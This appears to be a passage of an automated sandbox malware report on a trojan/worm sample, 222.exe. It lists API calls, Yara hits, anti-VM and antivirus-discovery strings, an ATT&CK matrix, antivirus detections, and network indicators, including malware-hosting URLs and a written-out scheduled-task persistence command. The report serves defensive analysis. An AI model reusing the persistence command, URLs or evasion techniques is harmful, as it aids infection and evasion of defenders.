                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 4068 Thread sleep count: 78 > 30
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 4068 Thread sleep time: -4680000s >= -30000s
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8368 Thread sleep time: -60000s >= -30000s
                              Source: C:\Users\user\Desktop\._cache_222.exe Last function: Thread delayed
                              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                              Source: C:\Users\user\Desktop\._cache_222.exe Thread sleep count: Count: 5206 delay: -10
                              Source: Yara match File source: 00000007.00000002.3263095777.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: 00000007.00000002.3264154997.00000000032E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: Process Memory Space: wscript.exe PID: 6048, type: MEMORYSTR
                              Source: Yara match File source: C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_0077DD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_0077DD92
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_007B2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_007B2044
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_007B219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_007B219F
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_007B24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_007B24A9
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_007A6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_007A6B3F
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_007A6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_007A6E4A
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_007AF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_007AF350
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_007AFD47 FindFirstFileW,FindClose,2_2_007AFD47
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_007AFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_007AFDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe Code function: 9_2_00492044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00492044
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe Code function: 9_2_0049219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_0049219F
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe Code function: 9_2_004924A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_004924A9
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe Code function: 9_2_00486B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_00486B3F
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe Code function: 9_2_00486E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_00486E4A
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe Code function: 9_2_0048F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_0048F350
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe Code function: 9_2_0048FD47 FindFirstFileW,FindClose,9_2_0048FD47
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe Code function: 9_2_0048FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_0048FDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe Code function: 9_2_0045DD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_0045DD92
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_0077E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_0077E47B
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Thread delayed: delay time: 60000
                              Source: C:\Users\user\Desktop\222.exe File opened: C:\Users\user
                              Source: C:\Users\user\Desktop\222.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                              Source: C:\Users\user\Desktop\222.exe File opened: C:\Users\user\AppData\Roaming
                              Source: C:\Users\user\Desktop\222.exe File opened: C:\Users\user\AppData
                              Source: C:\Users\user\Desktop\222.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                              Source: C:\Users\user\Desktop\222.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                              Source: Amcache.hve.20.dr Binary or memory string: VMware
                              Source: Amcache.hve.20.dr Binary or memory string: VMware Virtual USB Mouse
                              Source: Amcache.hve.20.dr Binary or memory string: vmci.syshbin
                              Source: Amcache.hve.20.dr Binary or memory string: VMware, Inc.
                              Source: Amcache.hve.20.dr Binary or memory string: VMware20,1hbin@
                              Source: Amcache.hve.20.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                              Source: Amcache.hve.20.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.20.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                              Source: ._cache_222.exe, 00000002.00000002.3265916885.00000000011D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                              Source: Amcache.hve.20.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
                              Source: Amcache.hve.20.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006BD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                              Source: Amcache.hve.20.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
                              Source: Amcache.hve.20.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.20.dr Binary or memory string: vmci.sys
                              Source: Amcache.hve.20.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                              Source: Amcache.hve.20.dr Binary or memory string: vmci.syshbin`
                              Source: Amcache.hve.20.dr Binary or memory string: \driver\vmci,\driver\pci
                              Source: ._cache_222.exe, 00000002.00000002.3265916885.00000000011D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
                              Source: Amcache.hve.20.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Amcache.hve.20.dr Binary or memory string: VMware20,1
                              Source: Amcache.hve.20.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                              Source: Amcache.hve.20.dr Binary or memory string: NECVMWar VMware SATA CD00
                              Source: Amcache.hve.20.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                              Source: Amcache.hve.20.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                              Source: Amcache.hve.20.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                              Source: Amcache.hve.20.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                              Source: Amcache.hve.20.dr Binary or memory string: VMware PCI VMCI Bus Device
                              Source: Amcache.hve.20.dr Binary or memory string: VMware VMCI Bus Device
                              Source: Amcache.hve.20.dr Binary or memory string: VMware Virtual RAM
                              Source: Amcache.hve.20.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                              Source: Amcache.hve.20.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
                              Source: C:\Users\user\Desktop\._cache_222.exe API call chain: ExitProcess graph end node graph_2-104780
                              Source: C:\Users\user\Desktop\._cache_222.exe API call chain: ExitProcess graph end node graph_2-106288
                              Source: C:\Users\user\Desktop\._cache_222.exe Process information queried: ProcessInformation
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_007B703C BlockInput,2_2_007B703C
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_0076374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,2_2_0076374E
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_007946D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,2_2_007946D0
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_008CB0C0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,2_2_008CB0C0
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_0078A937 GetProcessHeap,2_2_0078A937
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_00788E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00788E3C
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_00788E19 SetUnhandledExceptionFilter,2_2_00788E19
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe Code function: 9_2_00468E19 SetUnhandledExceptionFilter,9_2_00468E19
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe Code function: 9_2_00468E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00468E3C
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_0079BE95 LogonUserW,2_2_0079BE95
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_0076374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,2_2_0076374E
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_007A4B52 SendInput,keybd_event,2_2_007A4B52
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_007A7DD5 mouse_event,2_2_007A7DD5
                              Source: C:\Users\user\Desktop\222.exe Process created: C:\Users\user\Desktop\._cache_222.exe "C:\Users\user\Desktop\._cache_222.exe"
                              Source: C:\Users\user\Desktop\222.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_0079B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_0079B398
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_0079BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,2_2_0079BE31
                              Source: ._cache_222.exe, EWZJGF.exe Binary or memory string: Shell_TrayWnd
                              Source: ._cache_222.exe, 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp, EWZJGF.exe, 00000009.00000002.2118796035.00000000004EE000.00000040.00000001.01000000.00000009.sdmp, EWZJGF.exe, 0000000C.00000002.2168554745.00000000004EE000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_00787254 cpuid 2_2_00787254
                              Source: C:\Users\user\Desktop\222.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate
                              Source: C:\Users\user\Desktop\._cache_222.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_007840DA GetSystemTimeAsFileTime,__aulldiv,2_2_007840DA
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_007DC146 GetUserNameW,2_2_007DC146
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_00792C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_00792C3C
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_0077E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_0077E47B
                              Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                              Source: ._cache_222.exe, 00000002.00000002.3265916885.00000000011D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                              Source: C:\Users\user\Desktop\._cache_222.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                              Stealing of Sensitive Information

                              Source: Yara match File source: Process Memory Space: ._cache_222.exe PID: 6036, type: MEMORYSTR
                              Source: Yara match File source: 222.exe, type: SAMPLE
                              Source: Yara match File source: 0.0.222.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 00000000.00000000.2014175538.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match File source: 00000003.00000003.2091728789.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: Process Memory Space: 222.exe PID: 4616, type: MEMORYSTR
                              Source: Yara match File source: Process Memory Space: Synaptics.exe PID: 6192, type: MEMORYSTR
                              Source: Yara match File source: C:\ProgramData\Synaptics\RCX6FEC.tmp, type: DROPPED
                              Source: Yara match File source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1, type: DROPPED
                              Source: Yara match File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: ._cache_222.exe, 00000002.00000002.3273139948.00000000044A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_81B
                              Source: EWZJGF.exe, 00000015.00000002.2702247825.00000000004EE000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                              Source: EWZJGF.exe, 00000010.00000003.2422688024.0000000004D8A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_81
                              Source: EWZJGF.exe Binary or memory string: WIN_XP
                              Source: EWZJGF.exe Binary or memory string: WIN_XPe
                              Source: EWZJGF.exe, 00000015.00000002.2706925277.000000000467B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_81e
                              Source: EWZJGF.exe Binary or memory string: WIN_VISTA
                              Source: EWZJGF.exe Binary or memory string: WIN_7
                              Source: EWZJGF.exe Binary or memory string: WIN_8
                              Source: Yara match File source: Process Memory Space: ._cache_222.exe PID: 6036, type: MEMORYSTR

                              Remote Access Functionality

                              Source: Yara match File source: Process Memory Space: ._cache_222.exe PID: 6036, type: MEMORYSTR
                              Source: Yara match File source: 222.exe, type: SAMPLE
                              Source: Yara match File source: 0.0.222.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 00000000.00000000.2014175538.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match File source: 00000003.00000003.2091728789.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: Process Memory Space: 222.exe PID: 4616, type: MEMORYSTR
                              Source: Yara match File source: Process Memory Space: Synaptics.exe PID: 6192, type: MEMORYSTR
                              Source: Yara match File source: C:\ProgramData\Synaptics\RCX6FEC.tmp, type: DROPPED
                              Source: Yara match File source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1, type: DROPPED
                              Source: Yara match File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_007B91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_007B91DC
                              Source: C:\Users\user\Desktop\._cache_222.exe Code function: 2_2_007B96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_007B96E2
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe Code function: 9_2_004991DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,9_2_004991DC
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe Code function: 9_2_004996E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,9_2_004996E2
                              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                              Gather Victim Identity Information421
                              Scripting
                              2
                              Valid Accounts
                              11
                              Windows Management Instrumentation
                              421
                              Scripting
                              1
                              Exploitation for Privilege Escalation
                              1
                              Disable or Modify Tools
                              21
                              Input Capture
                              2
                              System Time Discovery
                              Remote Services1
                              Archive Collected Data
                              4
                              Ingress Tool Transfer
                              Exfiltration Over Other Network Medium1
                              System Shutdown/Reboot
                              CredentialsDomains1
                              Replication Through Removable Media
                              1
                              Native API
                              1
                              DLL Side-Loading
                              1
                              DLL Side-Loading
                              1
                              Deobfuscate/Decode Files or Information
                              LSASS Memory1
                              Peripheral Device Discovery
                              Remote Desktop Protocol21
                              Input Capture
                              11
                              Encrypted Channel
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts1
                              Scheduled Task/Job
                              2
                              Valid Accounts
                              1
                              Extra Window Memory Injection
                              21
                              Obfuscated Files or Information
                              Security Account Manager1
                              Account Discovery
                              SMB/Windows Admin Shares3
                              Clipboard Data
                              3
                              Non-Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron1
                              Scheduled Task/Job
                              2
                              Valid Accounts
                              1
                              Software Packing
                              NTDS4
                              File and Directory Discovery
                              Distributed Component Object ModelInput Capture34
                              Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd21
                              Registry Run Keys / Startup Folder
                              21
                              Access Token Manipulation
                              1
                              DLL Side-Loading
                              LSA Secrets38
                              System Information Discovery
                              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                              Process Injection
                              1
                              Extra Window Memory Injection
                              Cached Domain Credentials1
                              Query Registry
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                              Scheduled Task/Job
                              112
                              Masquerading
                              DCSync151
                              Security Software Discovery
                              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job21
                              Registry Run Keys / Startup Folder
                              2
                              Valid Accounts
                              Proc Filesystem21
                              Virtualization/Sandbox Evasion
                              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                              Virtualization/Sandbox Evasion
                              /etc/passwd and /etc/shadow3
                              Process Discovery
                              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                              Access Token Manipulation
                              Network Sniffing11
                              Application Window Discovery
                              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                              Process Injection
                              Input Capture1
                              System Owner/User Discovery
                              Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              [Behavior graph: ID 1582332, Sample: 222.exe, Start date: 30/12/2024, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label
222.exe | 86% | Virustotal |
222.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics
222.exe | 100% | Avira | TR/Dldr.Agent.SH
222.exe | 100% | Avira | W2000M/Dldr.Agent.17651006
222.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | TR/Dldr.Agent.SH
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | W2000M/Dldr.Agent.17651006
C:\Users\user\Documents\EEGWXUHVUG\~$cache1 | 100% | Avira | TR/Dldr.Agent.SH
C:\Users\user\Documents\EEGWXUHVUG\~$cache1 | 100% | Avira | W2000M/Dldr.Agent.17651006
C:\Users\user\AppData\Local\Temp\HBMQLS.vbs | 100% | Avira | VBS/Runner.VPJI
C:\ProgramData\Synaptics\RCX6FEC.tmp | 100% | Avira | TR/Dldr.Agent.SH
C:\ProgramData\Synaptics\RCX6FEC.tmp | 100% | Avira | W2000M/Dldr.Agent.17651006
C:\Users\user\Desktop\._cache_222.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe | 100% | Joe Sandbox ML |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Joe Sandbox ML |
C:\Users\user\Documents\EEGWXUHVUG\~$cache1 | 100% | Joe Sandbox ML |
C:\ProgramData\Synaptics\RCX6FEC.tmp | 100% | Joe Sandbox ML |
C:\ProgramData\Synaptics\RCX6FEC.tmp | 92% | ReversingLabs | Win32.Worm.Zorex
C:\ProgramData\Synaptics\Synaptics.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics
C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe | 55% | ReversingLabs | Win32.Trojan.Lisk
C:\Users\user\Desktop\._cache_222.exe | 55% | ReversingLabs | Win32.Trojan.Lisk
C:\Users\user\Documents\EEGWXUHVUG\~$cache1 | 92% | ReversingLabs | Win32.Worm.Zorex
                              No Antivirus matches
                              No Antivirus matches
Source | Detection | Scanner | Label
http://xred.site50.net/syn/SSLLibrary.dlp | 100% | Avira URL Cloud | malware
http://xred.site50.net/syn/SUpdate.iniH)O | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
freedns.afraid.org | 69.42.215.252 | true | false | | high
docs.google.com | 142.250.186.110 | true | false | | high
drive.usercontent.google.com | 142.250.186.33 | true | false | | high
xred.mooo.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
xred.mooo.com | false | | high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.186.110 | docs.google.com | United States | 15169 | GOOGLEUS | false
172.111.138.100 | unknown | United States | 3223 | VOXILITYGB | true
142.250.186.33 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
69.42.215.252 | freedns.afraid.org | United States | 17048 | AWKNET-LLCUS | false
                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                  Analysis ID:1582332
                                                                                                                  Start date and time:2024-12-30 11:22:07 +01:00
                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                  Overall analysis duration:0h 10m 0s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:full
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                  Number of analysed new started processes analysed:22
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Sample name:222.exe
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.troj.expl.evad.winEXE@20/59@10/4
                                                                                                                  EGA Information:
                                                                                                                  • Successful, ratio: 66.7%
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 100%
                                                                                                                  • Number of executed functions: 88
                                                                                                                  • Number of non-executed functions: 286
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.109.28.46, 184.28.90.27, 52.113.194.132, 20.50.201.204, 52.168.117.173, 40.126.32.133, 4.245.163.56, 23.1.237.91, 13.107.246.45
